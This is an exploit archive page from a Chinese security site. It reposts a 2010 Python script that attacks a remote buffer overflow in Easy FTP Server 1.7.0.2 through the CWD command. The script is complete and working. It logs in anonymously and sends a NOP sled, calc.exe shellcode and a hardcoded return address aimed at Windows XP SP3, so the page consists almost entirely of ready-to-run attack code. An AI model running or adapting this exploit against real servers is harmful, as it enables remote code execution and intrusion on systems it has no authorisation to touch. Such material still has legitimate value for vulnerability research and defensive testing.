首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easy FTP Server v1.7.0.2 CWD Remote BoF
来源:onbutler88[at]googlemail[dot]com 作者:athleet 发布时间:2010-02-23  

# Tested on: XP SP3 (Eng)
#!/usr/bin/python
import socket, sys

print """
*************************************************
* Easy FTP Server 1.7.0.2 Remote BoF *
*     Discovered by: athleet    *
* jonbutler88[at]googlemail[dot]com *
*************************************************
"""

if len(sys.argv) != 3:
 print "Usage: ./easyftp.py <Target IP> <Port>"
 sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
#
# B *0X009AFE44
#
shellcode = (
"\xba\x20\xf0\xfd\x7f" #    MOV EDX,7FFDF020
"\xc7\x02\x4c\xaa\xf8\x77" #   MOV DWORD PTR DS:[EDX],77F8AA4C
"\x33\xC0" #       XOR EAX,EAX
"\x50" #        PUSH EAX
"\x68\x63\x61\x6C\x63" #   PUSH 636C6163
"\x54" #       PUSH ESP
"\x5B" #       POP EBX
"\x50" #       PUSH EAX
"\x53" #       PUSH EBX
"\xB9\xC7\x93\xC2\x77" #   MOV ECX,77C293C7
"\xFF\xD1" #      CALL ECX
"\xEB\xF7" #      JMP SHORT 009AFE5B
)

nopsled = "\x90" * (268 - len(shellcode))

ret = "\x58\xFD\x9A\x00"

payload = nopsled + shellcode + ret # 272 bytes

print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
 connect=s.connect((target, port))
 print "[+] Connected!"
except:
 print "[!] Connection failed!"
 sys.exit(0)
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
# Send payload...
print "[+] Sending payload..."
s.send('CWD ' + payload + '\r\n')
try:
 s.recv(1024)
 print "[!] Exploit failed..."
except:
 print "[+] Exploited ^_^"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Chasys Media Player v1.1 (.mid
·E.M. Total Video Player v1.31
·GOM Player v2.1.21.4846 (.wav)
·E.M. Total Video Player 1.31 (
·Media Player Classic v6.4.9.1
·httpdx1.53b (sockets++ crash)
·VKPlayer 1.0 (.mid) Denial of
·Joomla Component com_ice Blind
·Nero Burning ROM v9.4.13.2 (is
·Linux x86 - /bin/sh 8 bytes
·Winamp 5.57 (Browser) IE Denia
·Joomla Component user_id com_s
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved